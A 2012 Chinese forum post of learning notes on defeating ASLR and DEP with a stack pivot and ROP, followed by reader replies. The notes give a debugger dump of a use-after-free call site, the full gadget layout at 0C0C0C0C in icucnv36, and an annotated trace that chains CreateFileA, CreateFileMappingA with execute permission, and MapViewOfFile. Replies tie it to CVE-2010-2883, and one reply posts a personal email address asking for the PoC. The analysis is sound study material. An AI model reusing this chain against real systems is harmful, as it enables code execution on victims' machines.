[原创]利用stackpivot和ROP绕过ASLR+DEP学习笔记
2012-2-10 16:50
; Vulnerable call site as shown in the debugger (x86-32, Intel syntax).
; ecx = pointer to a C++ object; per the author's note the heap block it points
; at has already been freed, so the vtable pointer read here comes from memory
; the program no longer owns (use-after-free). The unguarded indirect call four
; instructions later is the one point a mitigation has to cover (vtable-pointer
; validation / forward-edge CFI); everything else on this page follows from it.
mov     eax, [ecx]  ; eax = [ecx] = lpVtbl, the object's vtable pointer, read from freed heap memory
push    1
push    0
push    0EBh
push    ecx                  ; the object pointer itself is passed as an argument
call    dword ptr [eax+1Ch]  ; virtual call through vtable slot +1Ch; with the vtable under attacker control this is the control-flow hijack
test    eax, eax
setnz   al
retn
lpVtbl+1C  4A8453C3  icucnv36.4A8453C3
...
lpVtbl+3C  0C0C0C0C
...
0C0C0C0C ==>    > 0C0C0C0C
0C0C0C0C+4      > 0C0C0C0C
0C0C0C0C+8      > 4A806F29  RETURN to icucnv36.4A806F29 from icucnv36.icu_3_6::UnicodeString::doCompare
0C0C0C0C+C      > 4A8A0000  ASCII "UTF-32"
0C0C0C0C+10     > 4A802196  icucnv36.4A802196
0C0C0C0C+14     > 4A801F90  icucnv36.4A801F90
0C0C0C0C+18     > 4A806F29  RETURN to icucnv36.4A806F29 from icucnv36.icu_3_6::UnicodeString::doCompare
0C0C0C0C+1C     > 4A806CEF  icucnv36.4A806CEF
0C0C0C0C+20     > 00000000
0C0C0C0C+24     > 00000000
0C0C0C0C+28     > 00000000
0C0C0C0C+2C     > 00000000
0C0C0C0C+30     > 00000000
0C0C0C0C+34     > 00000002
0C0C0C0C+38     > 00000102
0C0C0C0C+3C     > 4A806F29  RETURN to icucnv36.4A806F29 from icucnv36.icu_3_6::UnicodeString::doCompare
0C0C0C0C+40     > 00000000
0C0C0C0C+44     > 00000000
0C0C0C0C+48     > 00000000
0C0C0C0C+4C     > 00000000
0C0C0C0C+50     > 00000000
0C0C0C0C+54     > 4A80A8A6  icucnv36.4A80A8A6
0C0C0C0C+58     > 4A801F90  icucnv36.4A801F90
0C0C0C0C+5C     > 4A849038  <&KERNEL32.CreateFileMappingA>
0C0C0C0C+60     > 4A8063A5  icucnv36.4A8063A5
0C0C0C0C+64     > 00000000
0C0C0C0C+68     > 00000000
0C0C0C0C+6C     > 00000000
0C0C0C0C+70     > 00000000
0C0C0C0C+74     > 00000000
0C0C0C0C+78     > 4A8A0000  ASCII "UTF-32"
0C0C0C0C+7C     > 4A802196  icucnv36.4A802196
0C0C0C0C+80     > 4A801F90  icucnv36.4A801F90
0C0C0C0C+84     > 4A84903C  <&KERNEL32.CreateFileA>
0C0C0C0C+88     > 4A80B692  icucnv36.4A80B692
0C0C0C0C+8C     > 4A801064  icucnv36.4A801064
0C0C0C0C+90     > 00000000
0C0C0C0C+94     > 10000000  sqlite.10000000
0C0C0C0C+98     > 00000000
0C0C0C0C+9C     > 00000000
0C0C0C0C+A0     > 00000002
0C0C0C0C+A4     > 00000102
0C0C0C0C+A8     > 00000000
0C0C0C0C+AC     > 4A8063A5  icucnv36.4A8063A5
0C0C0C0C+B0     > 4A801064  icucnv36.4A801064
0C0C0C0C+B4     > 4A842DB2  icucnv36.4A842DB2
0C0C0C0C+B8     > 4A802AB1  icucnv36.4A802AB1
0C0C0C0C+BC     > 00000008
0C0C0C0C+C0     > 4A80A8A6  icucnv36.4A80A8A6
0C0C0C0C+C4     > 4A801F90  icucnv36.4A801F90
0C0C0C0C+C8     > 4A849038  <&KERNEL32.CreateFileMappingA>
0C0C0C0C+CC     > 4A80B692  icucnv36.4A80B692
0C0C0C0C+D0     > 4A801064  icucnv36.4A801064
0C0C0C0C+D4     > FFFFFFFF
0C0C0C0C+D8     > 00000000
0C0C0C0C+DC     > 00000040
0C0C0C0C+E0     > 00000000
0C0C0C0C+E4     > 00010000  UNICODE "ALLUSERSPROFILE=C:\Documents and Settings\All Users"
0C0C0C0C+E8     > 00000000
0C0C0C0C+EC     > 4A8063A5  icucnv36.4A8063A5
0C0C0C0C+F0     > 4A801064  icucnv36.4A801064
0C0C0C0C+F4     > 4A842DB2  icucnv36.4A842DB2
0C0C0C0C+F8     > 4A802AB1  icucnv36.4A802AB1
0C0C0C0C+FC     > 00000008
0C0C0C0C+100    > 4A80A8A6  icucnv36.4A80A8A6
0C0C0C0C+104    > 4A801F90  icucnv36.4A801F90
0C0C0C0C+108    > 4A849030  <&KERNEL32.MapViewOfFile>
0C0C0C0C+10C    > 4A80B692  icucnv36.4A80B692
0C0C0C0C+110    > 4A801064  icucnv36.4A801064
0C0C0C0C+114    > FFFFFFFF
0C0C0C0C+118    > 00000022
0C0C0C0C+11C    > 00000000
0C0C0C0C+120    > 00000000
0C0C0C0C+124    > 00010000  UNICODE "ALLUSERSPROFILE=C:\Documents and Settings\All Users"
0C0C0C0C+128    > 4A8063A5  icucnv36.4A8063A5
0C0C0C0C+12C    > 4A8A0004  ASCII "32"
0C0C0C0C+130    > 4A802196  icucnv36.4A802196
0C0C0C0C+134    > 4A8063A5  icucnv36.4A8063A5
0C0C0C0C+138    > 4A801064  icucnv36.4A801064
0C0C0C0C+13C    > 4A842DB2  icucnv36.4A842DB2
0C0C0C0C+140    > 4A802AB1  icucnv36.4A802AB1
0C0C0C0C+144    > 00000030
0C0C0C0C+148    > 4A80A8A6  icucnv36.4A80A8A6
0C0C0C0C+14C    > 4A801F90  icucnv36.4A801F90
0C0C0C0C+150    > 4A8A0004  ASCII "32"
0C0C0C0C+154    > 4A80A7D8  RETURN to icucnv36.4A80A7D8 from msvcr80.__timezone
0C0C0C0C+158    > 4A8063A5  icucnv36.4A8063A5
0C0C0C0C+15C    > 4A801064  icucnv36.4A801064
0C0C0C0C+160    > 4A842DB2  icucnv36.4A842DB2
0C0C0C0C+164    > 4A802AB1  icucnv36.4A802AB1
0C0C0C0C+168    > 00000020
0C0C0C0C+16C    > 4A80A8A6  icucnv36.4A80A8A6
0C0C0C0C+170    > 4A8063A5  icucnv36.4A8063A5
0C0C0C0C+174    > 4A801064  icucnv36.4A801064
0C0C0C0C+178    > 4A80AEDC  icucnv36.4A80AEDC
0C0C0C0C+17C    > 4A801F90  icucnv36.4A801F90
0C0C0C0C+180    > 00000034
0C0C0C0C+184    > 4A80D585  icucnv36.4A80D585
0C0C0C0C+188    > 4A8063A5  icucnv36.4A8063A5
0C0C0C0C+18C    > 4A801064  icucnv36.4A801064
0C0C0C0C+190    > 4A842DB2  icucnv36.4A842DB2
0C0C0C0C+194    > 4A802AB1  icucnv36.4A802AB1
0C0C0C0C+198    > 0000000A
0C0C0C0C+19C    > 4A80A8A6  icucnv36.4A80A8A6
0C0C0C0C+1A0    > 4A801F90  icucnv36.4A801F90
0C0C0C0C+1A4    > 4A849170  <&MSVCR80.memcpy>
0C0C0C0C+1A8    > 4A80B692  icucnv36.4A80B692
0C0C0C0C+1AC    > FFFFFFFF
0C0C0C0C+1B0    > FFFFFFFF
0C0C0C0C+1B4    > FFFFFFFF
0C0C0C0C+1B8    > 00001000
; --- Trace, part 1: hijacked virtual call -> stack pivot -> first API call ---
; Every gadget address below lies inside icucnv36 (4A80xxxx), and the same
; addresses appear as literal constants in the layout at 0C0C0C0C: the chain
; only works because that module evidently sits at a fixed load address, i.e.
; it does not take part in ASLR. Defender's takeaway: one non-randomised module
; is enough to undo ASLR for the whole process, so per-module ASLR/DEP opt-in
; is worth auditing. The memory at 0C0C0C0C is assumed to already hold the
; layout dumped above; this page does not show how it got there.
;
; Stale vtable: slot +3C is itself a pointer into the controlled region.
4A8453C3    8B48 3C         mov     ecx, dword ptr [eax+3C]  ; ecx = [eax+3C] = 0C0C0C0C
4A8453C6    8B01            mov     eax, dword ptr [ecx]  ; eax = [ecx] = 0C0C0C0C
; The call goes to the dword at 0C0C0C0C+1C (see dump), the pivot gadget.
4A8453C8    FF50 1C         call    dword ptr [eax+1C]  ; [eax+1C] = [0C0C0C0C+1C] = icucnv36.4A806CEF
; Stack pivot: esp now points into the controlled buffer; the original esp
; (0012EF00) is kept in eax and saved to memory further down.
4A806CEF    94              xchg    eax, esp  ; stackpivot, esp = 0C0C0C0C, eax = 0012EF00
; Leftover instructions of the gadget body. bl is not used later on this page;
; xor al,al clears the low byte of eax, but 0012EF00 already ends in 00, so
; the saved esp value survives intact.
4A806CF0    C0EB 02         shr     bl, 2
4A806CF3    32C0            xor     al, al
4A806CF5    5F              pop     edi  ; edi = [0C0C0C0C] = 0C0C0C0C
4A806CF6    5E              pop     esi  ; esi = [0C0C0C0C+4] = 0C0C0C0C
4A806CF7    C3              retn  ; RETURN to [0C0C0C0C+8] = icucnv36.4A806F29
; Three passes through the same 'pop edi/esi/ebp ; retn 14' gadget. retn 14
; pops the return address and then discards 14h more bytes, which is why the
; next pops read +30 rather than +1C. These passes only step esp across the
; layout: none of the registers they load is referenced by a later gadget on
; this page (edi is overwritten at 4A842DB2 below).
4A806F29    5F              pop     edi  ; edi = [0C0C0C0C+C] = icucnv36.4A8A0000
4A806F2A    5E              pop     esi  ; esi = [0C0C0C0C+10] = icucnv36.4A802196
4A806F2B    5D              pop     ebp  ; ebp = [0C0C0C0C+14] = icucnv36.4A801F90
4A806F2C    C2 1400         retn    14  ; RETURN to [0C0C0C0C+18] = icucnv36.4A806F29
4A806F29    5F              pop     edi  ; edi = [0C0C0C0C+30] = 0
4A806F2A    5E              pop     esi  ; esi = [0C0C0C0C+34] = 2
4A806F2B    5D              pop     ebp  ; ebp = [0C0C0C0C+38] = 102
4A806F2C    C2 1400         retn    14  ; RETURN to [0C0C0C0C+3C] = icucnv36.4A806F29
4A806F29    5F              pop     edi  ; edi = [0C0C0C0C+54] = icucnv36.4A80A8A6
4A806F2A    5E              pop     esi  ; esi = [0C0C0C0C+58] = icucnv36.4A801F90
4A806F2B    5D              pop     ebp  ; ebp = [0C0C0C0C+5C] = &KERNEL32.CreateFileMappingA
4A806F2C    C2 1400         retn    14  ; RETURN to [0C0C0C0C+60] = icucnv36.4A8063A5
; Save the original esp (still in eax) at 4A8A0000. The dump labels that
; address as the string "UTF-32", so it is evidently writable data inside
; icucnv36. Presumably kept so the original stack can be restored later;
; nothing on this page reads it back.
4A8063A5    59              pop     ecx  ; ecx = [0C0C0C0C+78] = icucnv36.4A8A0000
4A8063A6    C3              retn  ; RETURN to [0C0C0C0C+7C] = icucnv36.4A802196
4A802196    8901            mov     dword ptr [ecx], eax  ; [ecx] = [4A8A0000] = eax = 0012EF00 
4A802198    C3              retn  ; RETURN to [0C0C0C0C+80] = icucnv36.4A801F90
; API call without any kernel32 address: pop the IAT slot of icucnv36
; (<&KERNEL32.CreateFileA>) and jump through it, so ASLR on kernel32 is
; irrelevant to the chain. Because this is jmp rather than call, CreateFileA
; returns to [esp] = 0C0C0C0C+8C = 4A801064 (a lone retn) and takes its seven
; arguments from +90..+A8 (dump below).
4A801F90    58              pop     eax  ; eax = [0C0C0C0C+84] = &KERNEL32.CreateFileA
4A801F91    C3              retn  ; RETURN to [0C0C0C0C+88] = icucnv36.4A80B692
4A80B692  - FF20            jmp     dword ptr [eax]           ; JUMP to [eax] = kernel32.CreateFileA
0C0C0C0C+8C     > 4A801064  /CALL to CreateFileA
0C0C0C0C+90     > 00000000  |FileName = NULL
0C0C0C0C+94     > 10000000  |Access = GENERIC_ALL
0C0C0C0C+98     > 00000000  |ShareMode = 0
0C0C0C0C+9C     > 00000000  |pSecurity = NULL
0C0C0C0C+A0     > 00000002  |Mode = CREATE_ALWAYS
0C0C0C0C+A4     > 00000102  |Attributes = HIDDEN|TEMPORARY
0C0C0C0C+A8     > 00000000  \hTemplateFile = NULL
eax = hFile
; --- Trace, part 2: CreateFileA has returned (eax = hFile) -> CreateFileMappingA ---
; The sequence 'pop ecx / xchg eax,edi / pop ebx / and [esp+ebx*2],edi' moves
; the previous API's return value into an argument slot of the next API's
; frame without a dedicated write gadget: the target slot (+D4) is pre-filled
; with FFFFFFFF in the layout, so AND-ing it with edi leaves exactly the handle.
4A801064    C3              retn  ; RETURN to [0C0C0C0C+AC] = icucnv36.4A8063A5
; ecx is loaded with a readable code address; the gadget at 4A80A8A6 may read
; [ecx+1] (see 4A80A8C2), so this presumably keeps that path from faulting.
4A8063A5    59              pop     ecx  ; ecx = [0C0C0C0C+B0] = icucnv36.4A801064
4A8063A6    C3              retn  ; RETURN to [0C0C0C0C+B4] = icucnv36.4A842DB2
4A842DB2    97              xchg    eax, edi  ; edi = hFile, eax = icucnv36.4A80A8A6
4A842DB3    C3              retn  ; RETURN to [0C0C0C0C+B8] = icucnv36.4A802AB1
4A802AB1    5B              pop     ebx  ; ebx = [0C0C0C0C+BC] = 8
4A802AB2    C3              retn  ; RETURN to [0C0C0C0C+C0] = icucnv36.4A80A8A6
; esp = 0C0C0C0C+C4 here, so esp+ebx*2 = +D4, the hFile slot of the
; CreateFileMappingA frame (FFFFFFFF in the dump above; the AND stores hFile).
4A80A8A6    213C5C          and     dword ptr [esp+ebx*2], edi  ; [esp+ebx*2] = [0C0C0C0C+D4] = edi = hFile
; The rest of the gadget is a character-class test on al. Every exit is a
; plain retn with esp untouched, so control reaches [0C0C0C0C+C4] regardless.
; On this pass al = A6 (low byte of 4A80A8A6), and the signed compares route
; it straight to 4A80A8C8 without reading [ecx+1].
4A80A8A9    75 03           jnz     short 4A80A8AE  ; JUMP to icucnv36.4A80A8AE
4A80A8AB    B0 01           mov     al, 1
4A80A8AD    C3              retn
4A80A8AE    3C 2F           cmp     al, 2F
4A80A8B0  ^ 74 F9           je      short 4A80A8AB
4A80A8B2    3C 41           cmp     al, 41
4A80A8B4    7C 04           jl      short 4A80A8BA
4A80A8B6    3C 5A           cmp     al, 5A
4A80A8B8    7E 08           jle     short 4A80A8C2
4A80A8BA    3C 61           cmp     al, 61
4A80A8BC    7C 0A           jl      short 4A80A8C8
4A80A8BE    3C 7A           cmp     al, 7A
4A80A8C0    7F 06           jg      short 4A80A8C8
4A80A8C2    8079 01 3A      cmp     byte ptr [ecx+1], 3A
4A80A8C6  ^ 74 E3           je      short 4A80A8AB
4A80A8C8    32C0            xor     al, al
4A80A8CA    C3              retn  ; RETURN to [0C0C0C0C+C4] = icucnv36.4A801F90
; Same IAT-jump idiom as for CreateFileA; arguments at +D4..+E8 (dump below).
; The protection argument 40 = PAGE_EXECUTE_READWRITE: the mapping object
; created here is what later provides executable memory despite DEP. For
; detection purposes, a section object created with execute permission and
; then mapped is the behaviour worth surfacing in telemetry.
4A801F90    58              pop     eax  ; eax = [0C0C0C0C+C8] = &KERNEL32.CreateFileMappingA
4A801F91    C3              retn  ; RETURN to [0C0C0C0C+CC] = icucnv36.4A80B692
4A80B692  - FF20            jmp     dword ptr [eax]  ; JUMP to [eax] = kernel32.CreateFileMappingA
0C0C0C0C+D0     > 4A801064  /CALL to CreateFileMappingA
0C0C0C0C+D4     > FFFFFFFF  |hFile = FFFFFFFF
0C0C0C0C+D8     > 00000000  |pSecurity = NULL
0C0C0C0C+DC     > 00000040  |Protection = PAGE_EXECUTE_READWRITE
0C0C0C0C+E0     > 00000000  |MaximumSizeHigh = 0
0C0C0C0C+E4     > 00010000  |MaximumSizeLow = 10000
0C0C0C0C+E8     > 00000000  \MapName = NULL
eax = hMapObject
; --- Trace, part 3: CreateFileMappingA has returned (eax = hMapObject) -> MapViewOfFile ---
; Same three-gadget idiom as part 2, this time planting hMapObject into +114,
; the first argument slot of the MapViewOfFile frame (pre-filled with FFFFFFFF
; in the dump above).
4A801064    C3              retn  ; RETURN to [0C0C0C0C+EC] = icucnv36.4A8063A5
; Again a valid address in ecx so the [ecx+1] read at 4A80A8C2 cannot fault.
4A8063A5    59              pop     ecx  ; ecx = [0C0C0C0C+F0] = icucnv36.4A801064
4A8063A6    C3              retn  ; RETURN to [0C0C0C0C+F4] = icucnv36.4A842DB2
; xchg: edi <- hMapObject (the return value), eax <- previous edi (hFile).
4A842DB2    97              xchg    eax, edi  ; edi = hMapObject, eax = hFile
4A842DB3    C3              retn  ; RETURN to [0C0C0C0C+F8] = icucnv36.4A802AB1
4A802AB1    5B              pop     ebx  ; ebx = [0C0C0C0C+FC] = 8
4A802AB2    C3              retn  ; RETURN to [0C0C0C0C+100] = icucnv36.4A80A8A6
; esp = 0C0C0C0C+104 here, so esp+ebx*2 = +114 (FFFFFFFF in the dump above).
4A80A8A6    213C5C          and     dword ptr [esp+ebx*2], edi  ; [esp+ebx*2] = [0C0C0C0C+114] = edi = hMapObject
; al is now the low byte of hFile, so which branch runs depends on the handle
; value; every exit is still a retn with esp unchanged, and the only memory
; read ([ecx+1]) goes through the valid address loaded at 4A8063A5, so the
; gadget is safe on any path.
4A80A8A9    75 03           jnz     short 4A80A8AE  ; JUMP to icucnv36.4A80A8AE
4A80A8AB    B0 01           mov     al, 1
4A80A8AD    C3              retn
4A80A8AE    3C 2F           cmp     al, 2F
4A80A8B0  ^ 74 F9           je      short 4A80A8AB
4A80A8B2    3C 41           cmp     al, 41
4A80A8B4    7C 04           jl      short 4A80A8BA
4A80A8B6    3C 5A           cmp     al, 5A
4A80A8B8    7E 08           jle     short 4A80A8C2
4A80A8BA    3C 61           cmp     al, 61
4A80A8BC    7C 0A           jl      short 4A80A8C8
4A80A8BE    3C 7A           cmp     al, 7A
4A80A8C0    7F 06           jg      short 4A80A8C8
4A80A8C2    8079 01 3A      cmp     byte ptr [ecx+1], 3A
4A80A8C6  ^ 74 E3           je      short 4A80A8AB
4A80A8C8    32C0            xor     al, al
4A80A8CA    C3              retn  ; RETURN to [0C0C0C0C+104] = icucnv36.4A801F90
; The trace on this page stops at the jump into MapViewOfFile. Its arguments
; are the dwords from +118 onward in the dump (22, 0, 0, 10000); the 22 would
; be the access flags if the frame follows MapViewOfFile's parameter order --
; verify against the dump. The replies note that the returned view is where
; the payload is later copied; from a defender's side, the MapViewOfFile of an
; execute-capable section created by the same process is the observable event.
4A801F90    58              pop     eax  ; eax = [0C0C0C0C+108] = &KERNEL32.MapViewOfFile
4A801F91    C3              retn  ; RETURN to [0C0C0C0C+10C] = icucnv36.4A80B692
4A80B692  - FF20            jmp     dword ptr [eax]  ; JUMP to [eax] = kernel32.MapViewOfFile

最新回复 (19)
先回帖再学习!
2012-2-10 16:51
去年有分析该漏洞的实际病毒样本,也大多是利用这些API函数来绕过DEP:创建临时文件,然后内存映射,再复制shellcode。
2012-2-10 17:45
说的清楚明白,顶贴
2012-2-10 17:49
恩 前段时间分析的一个利用较老漏洞的pdf也用的这个方法 交换了栈
2012-2-11 10:40
大概2010年的时候调试一个PDF漏洞时发现利用的这个方法。。。
比较老了。呵呵
2012-2-12 22:05
学习学习

谢谢lz
2012-2-12 22:18
嗯 学习一下
2012-2-13 00:36
谢谢 楼主 分享~
2012-2-13 00:37
虽然看不懂,但是觉得好厉害
2012-2-13 00:43
顶啊顶啊顶~~~~~~
2012-2-13 13:39
标志一下,晚上再看..
2012-2-13 13:59
adobe reader cooltype漏洞的poc,也使用了创建临时文件再map的方法,但是该漏洞是栈溢出。不知你是否指的这个漏洞?
2012-2-14 00:08
顶啊顶啊顶  看看在说
2012-2-21 14:52
我靠,真tnnd的n
2012-2-24 19:20
是说的CVE-2010-2883么,当时用的3.4版本的IBM的库
2012-3-3 10:40
pbt
说的清楚明白,顶贴,很好啊
2012-3-8 18:14
特意登录顶帖,好帖必须顶起!!!
2012-5-8 22:53
楼主有做出相应的POC么,不知道能不能和我共享下~我的邮箱:695473585@qq.com
2012-11-30 16:13
MSF上有
2012-12-4 11:54